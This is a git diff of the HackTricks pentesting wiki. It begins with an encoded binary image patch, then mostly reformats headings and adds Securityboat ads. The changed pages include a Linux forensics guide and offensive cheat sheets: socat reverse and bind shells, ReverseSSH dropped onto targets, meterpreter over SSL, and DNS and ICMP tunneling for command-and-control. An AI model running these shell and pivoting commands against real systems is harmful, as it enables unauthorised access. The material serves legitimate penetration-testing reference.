z7b)wvae+d#w8ai)sGR7HKQuZ^`Y)`8IY+#2{?2V{iV4CuAwPi~K79le({vxBFoHZa zic&k{a$Vy$AjtR%>(5OcO8A!~>5DaL$2l7Dl0Y`4&QkB~d74T=Y#^E4ox9!U%wLUK zsGRaHSP3?{*~f4?=>Efiqo|y^Li3xfG`T~g!vA+b@@5myLyFo@TRRNO!;esRb1dM= zv=niJa4|00=(J%dnm)6@40*>K6$HX?Uo)CAAuYIWcV;}Lr4({z zz{|1sn0`PTnN|t#s5j@LTz8+le0MC&Jvw3eIGdV^B8H;FXD2MQy*@^4B3&(DD^ovZ zd?b?Wq`m&~6fpK_4k`4fMo2#%cfIKSZ`I6L$+KgHJqjn(Qo-L3R1nv#l9$BY)Zjo& zTg%+}fB~(n3R<^RwP{=8dfTEld!8-nbz>T**n*v=ckfdkmRPz>{#4hnN_<&q8&>;& zHO^f>c0Xg?2pSena1&!{8OOi;iV&6V`o3p|pfv;gqp@C#zvlv}KyT_Z7yisE_7`3Y zFsgDgc68zy%|cFdiElSv9Ev%bJA?db1`)Dj`0M3+G9Wv(rzWTgB0y^=)jX{h_@VG5Vn>Nle=;@k8sUOM2t#nm+vRh)YNRpd^5%oK+ z<;;U(SQit&n0qio(n(%gV@>npDcS4m)QL*r#_qy7@S8km8Cc>%oo6%s30Ki@Ej$I$ z)GQl*kMcfROU1g-%{Zt0oqe%sNZ@;_ET&}IHJg^D08-3t)*r9HA6E;KAYh+m0y5*MQlnebs@=^MGOQ{H6X$B_9UPlKxl?Omb8BGPitX@ zo>1<*2%nw%I8zZmTNj60dto=c0$pePcQ-z-+Q5^KC47yJpJmfL=l{Nls=S7k8yJeU zE=sT5`4mH;&7(Jz5w-XV$-?b1AIQa1bwsfl(qFtb)Lb-R?c@#DE8tlNXP%X_4C-7x zS_6T&A>6(qISm3y#nOyFjs;;yDPP`@b3sIlzB5I#xS7W}% z;-2$!5hY8Ez$Pvy4ch{?)$#MyG`-c&@1eQ`lTUp@+JsH5+9qGP>&+cGq zr0#NQI;yy)zBv{zu>!>YXGdR3vYCd2Sta9f|LLPIF{%nO;u%fE)L3-A`W723`7eGD zv=4X~5exD>jPi({Jg?;$qyYzWr;5DL@`oEVJ)W$r9omjY+rM8w(x`~JA2J4hqy7li z*vnQy+XpaIbS%y!*~xgNN9Ea$l%kp|S@HdMSr(T$lgW?PiuqSMc{toh&tATdZ$+A+ zw79Nc|GI;$KBi#C$5aNk~!8Oyd#HsLwEl zp?ZsR_^`wLXbm5V^r(LbQq{7SeR)O!--p!cbAD7^8)f?lRzkWSel54IZ~N`ojP!dy z3E~(%t0A!*hfI`5>qcJe8I8tmHQEgxXviLOeS^pwe@bg=n!$R*V`$|CjjPuv^!V$A zp4@3MtgnRk40{4vbx^0EVZUiiCPQ=zKh46 zvwHH;*~~{7$jlEmr8Q{^-&~5sv9lK0_+RYFy^r<^@Gx0f8Ri@)KEnFV9hx4Z&)^hD zB-2)bKcHhp>w{}DOuAzvhObsvIoa9y8C8vk!PFNIN1e-O6^xs)B;(#~ZNZaexpPNsh%o2=1xdPT)3;4Ug*Of$p^q);qyE%#vB#4eJ1ZA5I^}J8 zOsx-LezJ_=owkbaV>YmdC^qLDS6a0cmJSR~yY}e_QJ=?tk@UJ{lj-JV{Rfia@4i$W zjIF$8n$zb@)qHae931Shg~J@-M}c;P`7inNIaj`7x~V9qTq6e3(9x35mY%gxt>+!& zgnjL0wi}zG96Z9WPsiI|>?S~O;MREvfvj=9Ua^Zf&c8HY@-=Q$sm67l-IVHRd!nJg zKON02PHt5s_{8lJ?*nns)y4}NR<*c3U&CxDG+#rq;- za~{cWE+EY$?A!V`TmC#6?7>d`aOpnPoij*+0_z-OE b@Q@fm9B|RxNwf1d;Y-k6#XEVo4WIuX_TRx7 literal 0 HcmV?d00001 diff --git a/README.md b/README.md index a57aae86..4419ecea 100644 --- a/README.md +++ b/README.md @@ -60,12 +60,21 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm ![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (13).png>) -**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform** +**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.** -**Bug bounty tip**:**sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} +### [SecurityBoat](https://securityboat.in) + +![](<.gitbook/assets/SB logo black\_034525.png>) + +**Securityboat** is a cybersecurity company focused on providing top of the line **penetration testing services** and the most comprehensive **automated security testing** solutions based on an extensive **manual security testing methodology** that utilizes various case-specific and **industry-tested** solutions. They are committed to providing clear communication on cybersecurity issues, developing solutions, and prioritizing **business risk**.\ +**Make the right choice by contacting us for your security:** + +{% embed url="https://securityboat.in/contact-us" %} + ### [**INE**](https://ine.com) ![](<.gitbook/assets/INE\_Logo (3).jpg>) diff --git a/forensics/basic-forensic-methodology/linux-forensics.md b/forensics/basic-forensic-methodology/linux-forensics.md index 0b5fb1ae..0b5ed10d 100644 --- a/forensics/basic-forensic-methodology/linux-forensics.md +++ b/forensics/basic-forensic-methodology/linux-forensics.md @@ -1,4 +1,4 @@ - +# Linux Forensics

@@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# Initial Information Gathering +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} -## Basic Information +## Initial Information Gathering + +### Basic Information First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get a ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USN, and modify the env variables to use those binaries: @@ -48,7 +54,7 @@ cat /etc/shadow #Unexpected data? find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory ``` -### Suspicious information +#### Suspicious information While obtaining the basic information you should check for weird things like: @@ -56,7 +62,7 @@ While obtaining the basic information you should check for weird things like: * Check **registered logins** of users without a shell inside `/etc/passwd` * Check for **password hashes** inside `/etc/shadow` for users without a shell -## Memory Dump +### Memory Dump In order to obtain the memory of the running system it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\ In order to **compile** it you need to use the **exact same kernel** the victim machine is using. @@ -81,14 +87,14 @@ LiME supports 3 **formats**: LiME can also be use to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444` -## Disk Imaging +### Disk Imaging -### Shutting down +#### Shutting down First of all you will need to **shutdown the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shutdown.\ There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but I will also allow the possible **malware** to **destroy evidences**. The "pull the plug" approach may carry **some information loss** (as we have already took an image of the memory not much info is going to be lost) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug. -### Taking an image of the disk +#### Taking an image of the disk It's important to note that **before connecting to your computer anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying the any information. @@ -101,7 +107,7 @@ dcfldd if= of= bs=512 hash= hashwindow=) -# Inspect AutoStart locations +## Inspect AutoStart locations -## Scheduled Tasks +### Scheduled Tasks ```bash cat /var/spool/cron/crontabs/* \ @@ -235,7 +241,7 @@ cat /var/spool/cron/crontabs/* \ ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ``` -## Services +### Services It is extremely common for malware to entrench itself as a new, unauthorized service. Linux has a number of scripts that are used to start services as the computer boots. The initialization startup script _**/etc/inittab**_ calls other scripts such as rc.sysinit and various startup scripts under the _**/etc/rc.d/**_ directory, or _**/etc/rc.boot/**_ in some older versions. On other versions of Linux, such as Debian, startup scripts are stored in the _**/etc/init.d/**_ directory. In addition, some common services are enabled in _**/etc/inetd.conf**_ or _**/etc/xinetd/**_ depending on the version of Linux. Digital investigators should inspect each of these startup scripts for anomalous entries. @@ -248,11 +254,11 @@ It is extremely common for malware to entrench itself as a new, unauthorized ser * _**/etc/systemd/system**_ * _**/etc/systemd/system/multi-user.target.wants/**_ -## Kernel Modules +### Kernel Modules On Linux systems, kernel modules are commonly used as rootkit components to malware packages. Kernel modules are loaded when the system boots up based on the configuration information in the `/lib/modules/'uname -r'` and `/etc/modprobe.d` directories, and the `/etc/modprobe` or `/etc/modprobe.conf` file. These areas should be inspected for items that are related to malware. -## Other AutoStart Locations +### Other AutoStart Locations There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system that may contain traces of malware. @@ -260,11 +266,11 @@ There are several configuration files that Linux uses to automatically launch an * _**∼/.bashrc**_ , _**∼/.bash\_profile**_ , _**\~/.profile**_ , _**∼/.config/autostart**_ are executed when the specific user logs in. * _**/etc/rc.local**_ It is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel. -# Examine Logs +## Examine Logs Look in all available log files on the compromised system for traces of malicious execution and associated activities such as creation of a new service. -## Pure Logs +### Pure Logs **Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\ Interesting system logons: @@ -291,7 +297,7 @@ Interesting system logons: Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. In fact, because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering. {% endhint %} -## Command History +### Command History Many Linux systems are configured to maintain a command history for each user account: @@ -300,7 +306,7 @@ Many Linux systems are configured to maintain a command history for each user ac * \~/.sh\_history * \~/.\*\_history -## Logins +### Logins Using the command `last -Faiwx` it's possible to get the list of users that have logged in.\ It's recommended to check if those logins make sense: @@ -312,7 +318,7 @@ This is important as **attackers** some times may copy `/bin/bash` inside `/bin/ Note that you can also **take a look to this information reading the logs**. -## Application Traces +### Application Traces * **SSH**: Connections to systems made using SSH to and from a compromised system result in entries being made in files for each user account (_**∼/.ssh/authorized\_keys**_ and _**∼/.ssh/known\_keys**_). These entries can reveal the hostname or IP address of the remote hosts. * **Gnome Desktop**: User accounts may have a _**∼/.recently-used.xbel**_ file that contains information about files that were recently accessed using applications running in the Gnome desktop. @@ -321,20 +327,20 @@ Note that you can also **take a look to this information reading the logs**. * **MySQL**: User accounts may have a _**∼/.mysql\_history**_ file that contains queries executed using MySQL. * **Less**: User accounts may have a _**∼/.lesshst**_ file that contains details about the use of less, including search string history and shell commands executed via less -## USB Logs +### USB Logs [**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables. It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USB to find "violation events" (the use of USBs that aren't inside that list). -## Installation +### Installation ``` pip3 install usbrip usbrip ids download #Downloal USB ID database ``` -## Examples +### Examples ``` usbrip events history #Get USB history of your curent linux machine @@ -346,13 +352,13 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) -# Review User Accounts and Logon Activities +## Review User Accounts and Logon Activities Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check possible sudo brute-force attacks.\ Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\ Finally look for accounts with **no passwords** or **easily guessed** passwords. -# Examine File System +## Examine File System File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of **malware**.\ **Malware** is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with time line analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system.\ @@ -375,27 +381,27 @@ You can check the inodes of the files inside a folder using `ls -lai /bin |sort Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modify at the **same time** of the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**. {% endhint %} -# Compare files of different filesystem versions +## Compare files of different filesystem versions -### Find added files +#### Find added files ```bash git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ ``` -### Find Modified content +#### Find Modified content ```bash git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time" ``` -### Find deleted files +#### Find deleted files ```bash git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ ``` -### Other filters +#### Other filters **`-diff-filter=[(A|C|D|M|R|T|U|X|B)…​[*]]`** @@ -405,11 +411,17 @@ Also, **these upper-case letters can be downcased to exclude**. E.g. `--diff-fil Note that not all diffs can feature all types. For instance, diffs from the index to the working tree can never have Added entries (because the set of paths included in the diff is limited by what is in the index). Similarly, copied and renamed entries cannot appear if detection for those types is disabled. -# References +## References * [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf) * [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ + +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -426,5 +438,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/generic-methodologies-and-resources/shells/full-ttys.md b/generic-methodologies-and-resources/shells/full-ttys.md index d7d66fbb..2a388d61 100644 --- a/generic-methodologies-and-resources/shells/full-ttys.md +++ b/generic-methodologies-and-resources/shells/full-ttys.md @@ -1,4 +1,4 @@ - +# Full TTYs
@@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# Full TTY +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} + +## Full TTY Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found the /etc/shells file This incident has been reported`. Also note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`. @@ -39,7 +45,7 @@ socat file:`tty`,raw,echo=0 tcp-listen:4444 socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 ``` -## **Spawn shells** +### **Spawn shells** * `python -c 'import pty; pty.spawn("/bin/sh")'` * `echo os.system('/bin/bash')` @@ -54,7 +60,7 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 * vi: `:set shell=/bin/bash:shell` * nmap: `!sh` -# ReverseSSH +## ReverseSSH A convenient way for **interactive shell access**, as well as **file transfers** and **port forwarding**, is dropping the statically-linked ssh server [ReverseSSH](https://github.com/Fahrj/reverse-ssh) onto the target. @@ -69,7 +75,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers /dev/shm/reverse-ssh -v -l -p 4444 ``` -* \(2a\) Linux target: +* (2a) Linux target: ```bash # Drop it via your preferred way, e.g. @@ -78,7 +84,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers /dev/shm/reverse-ssh -p 4444 kali@10.0.0.2 ``` -* \(2b\) Windows 10 target \(for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)\): +* (2b) Windows 10 target (for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)): ```bash # Drop it via your preferred way, e.g. @@ -97,7 +103,7 @@ ssh -p 8888 127.0.0.1 sftp -P 8888 127.0.0.1 ``` -# No TTY +## No TTY If for some reason you cannot obtain a full TTY you **still can interact with programs** that expects user input. In the following example, the password is passed to `sudo` to read a file: @@ -105,7 +111,12 @@ If for some reason you cannot obtain a full TTY you **still can interact with pr expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "";send "\r\n";interact' ``` +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -122,5 +133,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md index 7e338c7f..330f798c 100644 --- a/generic-methodologies-and-resources/tunneling-and-port-forwarding.md +++ b/generic-methodologies-and-resources/tunneling-and-port-forwarding.md @@ -1,4 +1,4 @@ - +# Tunneling and Port Forwarding
@@ -16,18 +16,24 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ -# **SSH** +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %} -SSH graphical connection \(X\) +## **SSH** + +SSH graphical connection (X) ```bash ssh -Y -C @ #-Y is less secure but faster than -X ``` -## Local Port2Port +### Local Port2Port -Open new Port in SSH Server --> Other port +Open new Port in SSH Server --> Other port ```bash ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in port 10521 from everywhere @@ -37,9 +43,9 @@ ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in port 10521 from everywhere ``` -## Port2Port +### Port2Port -Local port --> Compromised host \(SSH\) --> Third\_box:Port +Local port --> Compromised host (SSH) --> Third\_box:Port ```bash ssh -i ssh_key @ -L :: [-p ] [-N -f] #This way the terminal is still in your host @@ -47,18 +53,18 @@ ssh -i ssh_key @ -L :::631 -N -f -l ``` -## Port2hostnet \(proxychains\) +### Port2hostnet (proxychains) -Local Port --> Compromised host \(SSH\) --> Wherever +Local Port --> Compromised host (SSH) --> Wherever ```bash ssh -f -N -D @ #All sent to local port will exit through the compromised server (use as proxy) ``` -## VPN-Tunnel +### VPN-Tunnel -You need **root in both devices** \(as you are going to create new interfaces\) and the sshd config has to allow root login: -`PermitRootLogin yes` +You need **root in both devices** (as you are going to create new interfaces) and the sshd config has to allow root login:\ +`PermitRootLogin yes`\ `PermitTunnel yes` ```bash @@ -76,13 +82,13 @@ iptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE Set new route on client side -```text +``` route add -net 10.0.0.0/16 gw 1.1.1.1 ``` -# SSHUTTLE +## SSHUTTLE -You can **tunnel** via **ssh** all the **traffic** to a **subnetwork** through a host. +You can **tunnel** via **ssh** all the **traffic** to a **subnetwork** through a host.\ Example, forwarding all the traffic going to 10.10.10.0/24 ```bash @@ -90,18 +96,18 @@ pip install sshuttle sshuttle -r user@host 10.10.10.10/24 ``` -# Meterpreter +## Meterpreter -## Port2Port +### Port2Port -Local port --> Compromised host \(active session\) --> Third\_box:Port +Local port --> Compromised host (active session) --> Third\_box:Port ```bash # Inside a meterpreter session portfwd add -l -p -r ``` -## Port2hostnet \(proxychains\) +### Port2hostnet (proxychains) ```bash background# meterpreter session @@ -126,22 +132,22 @@ run #Proxy port 1080 by default echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains ``` -# reGeorg +## reGeorg [https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg) -You need to upload a web file tunnel: ashx\|aspx\|js\|jsp\|php\|php\|jsp +You need to upload a web file tunnel: ashx|aspx|js|jsp|php|php|jsp ```bash python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp ``` -# Chisel +## Chisel -You can download it from the releases page of [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel) +You can download it from the releases page of [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)\ You need to use the **same version for client and server** -## socks +### socks ```bash ./chisel server -p 8080 --reverse #Server @@ -149,18 +155,18 @@ You need to use the **same version for client and server** #And now you can use proxychains with port 1080 (default) ``` -## Port forwarding +### Port forwarding ```bash ./chisel_1.7.6_linux_amd64 server -p 12312 --reverse ./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 ``` -# Rpivot +## Rpivot [https://github.com/klsecservices/rpivot](https://github.com/klsecservices/rpivot) -Reverse tunnel. The tunnel is started from the victim. +Reverse tunnel. The tunnel is started from the victim.\ A socks4 proxy is created on 127.0.0.1:1080 ```bash @@ -181,37 +187,37 @@ victim> python client.py --server-ip --server-port 9999 --ntl victim> python client.py --server-ip --server-port 9999 --ntlm-proxy-ip --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45 ``` -# **Socat** +## **Socat** [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries) -## Bind shell +### Bind shell ```bash victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane attacker> socat FILE:`tty`,raw,echo=0 TCP::1337 ``` -## Reverse shell +### Reverse shell ```bash attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0 victim> socat TCP4::1337 EXEC:bash,pty,stderr,setsid,sigint,sane ``` -## Port2Port +### Port2Port ```bash socat TCP-LISTEN:,fork TCP:: & ``` -## Port2Port through socks +### Port2Port through socks ```bash socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678 ``` -## Meterpreter through SSL Socat +### Meterpreter through SSL Socat ```bash #Create meterpreter backdoor to port 3333 and start msfconsole listener in that port @@ -231,7 +237,7 @@ OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacke [https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/](https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/) -## SSL Socat Tunnel +### SSL Socat Tunnel **/bin/sh console** @@ -251,9 +257,9 @@ attacker-listener> socat OPENSSL-LISTEN:433,reuseaddr,cert=server.pem,cafile=cli victim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt ``` -## Remote Port2Port +### Remote Port2Port -Connect the local SSH port \(22\) to the 443 port of the attacker host +Connect the local SSH port (22) to the 443 port of the attacker host ```bash attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost @@ -261,9 +267,9 @@ victim> while true; do socat TCP4::443 TCP4:127.0.0.1:22 ; done # Esta attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh of the victim ``` -# Plink.exe +## Plink.exe -It's like a console PuTTY version \( the options are very similar to a ssh client\). +It's like a console PuTTY version ( the options are very similar to a ssh client). As this binary will be executed in the victim and it is a ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward a only locally accessible port to a port in our machine: @@ -272,23 +278,23 @@ echo y | plink.exe -l -pw [-p ] -R < echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090 ``` -# NTLM proxy bypass +## NTLM proxy bypass -The previously mentioned tool: **Rpivot** +The previously mentioned tool: **Rpivot**\ **OpenVPN** can also bypass it, setting these options in the configuration file: ```bash http-proxy 8080 ntlm ``` -## Cntlm +### Cntlm -[http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net/) +[http://cntlm.sourceforge.net/](http://cntlm.sourceforge.net) -It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port. +It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port.\ Example that forward port 443 -```text +``` Username Alice Password P@ssw0rd Domain CONTOSO.COM @@ -296,22 +302,22 @@ Proxy 10.0.0.10:8080 Tunnel 2222::443 ``` -Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222. +Now, if you set for example in the victim the **SSH** service to listen in port 443. You can connect to it through the attacker port 2222.\ You could also use a **meterpreter** that connects to localhost:443 and the attacker is listening in port 2222. -# YARP +## YARP A reverse proxy create by Microsoft. You can find it here: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy) -# DNS Tunneling +## DNS Tunneling -## Iodine +### Iodine [https://code.kryo.se/iodine/](https://code.kryo.se/iodine/) Root is needed in both systems to create tun adapters and tunnels data between them using DNS queries. -```text +``` attacker> iodined -f -c -P P@ssw0rd 1.1.1.1 tunneldomain.com victim> iodine -f -P P@ssw0rd tunneldomain.com -r #You can see the victim at 1.1.1.2 @@ -319,13 +325,13 @@ victim> iodine -f -P P@ssw0rd tunneldomain.com -r The tunnel will be really slow. You can create a compressed SSH connection through this tunnel by using: -```text +``` ssh @1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080 ``` -## DNSCat2 +### DNSCat2 -Establishes a C&C channel through DNS. It doesn't need root privileges. +Establishes a C\&C channel through DNS. It doesn't need root privileges. ```bash attacker> ruby ./dnscat2.rb tunneldomain.com @@ -339,19 +345,19 @@ session -i listen [lhost:]lport rhost:rport #Ex: listen 127.0.0.1:8080 10.0.0.20:80, this bind 8080port in attacker host ``` -### Change proxychains DNS +#### Change proxychains DNS -Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. By **default** the **DNS** server that proxychains use is **4.2.2.2** \(hardcoded\). To change it, edit the file: _/usr/lib/proxychains3/proxyresolv_ and change the IP. If you are in a **Windows environment** you could set the IP of the **domain controller**. +Proxychains intercepts `gethostbyname` libc call and tunnels tcp DNS request through the socks proxy. By **default** the **DNS** server that proxychains use is **4.2.2.2** (hardcoded). To change it, edit the file: _/usr/lib/proxychains3/proxyresolv_ and change the IP. If you are in a **Windows environment** you could set the IP of the **domain controller**. -# Tunnels in Go +## Tunnels in Go [https://github.com/hotnops/gtunnel](https://github.com/hotnops/gtunnel) -# ICMP Tunneling +## ICMP Tunneling -## Hans +### Hans -[https://github.com/friedrich/hans](https://github.com/friedrich/hans) +[https://github.com/friedrich/hans](https://github.com/friedrich/hans)\ [https://github.com/albertzak/hanstunnel](https://github.com/albertzak/hanstunnel) Root is needed in both systems to create tun adapters and tunnels data between them using ICMP echo requests. @@ -362,13 +368,18 @@ Root is needed in both systems to create tun adapters and tunnels data between t ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100 ``` -# Other tools to check +## Other tools to check * [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf) * [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy) * [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel) +{% hint style="danger" %} +\ +_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_ +{% embed url="https://securityboat.in/contact-us" %} +{% endhint %}
@@ -385,5 +396,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- - diff --git a/mobile-pentesting/android-app-pentesting/smali-changes.md b/mobile-pentesting/android-app-pentesting/smali-changes.md index 70016b92..9aaa499a 100644 --- a/mobile-pentesting/android-app-pentesting/smali-changes.md +++ b/mobile-pentesting/android-app-pentesting/smali-changes.md @@ -1,4 +1,4 @@ - +# Smali - Decompiling/\[Modifying]/Compiling
@@ -16,16 +16,24 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
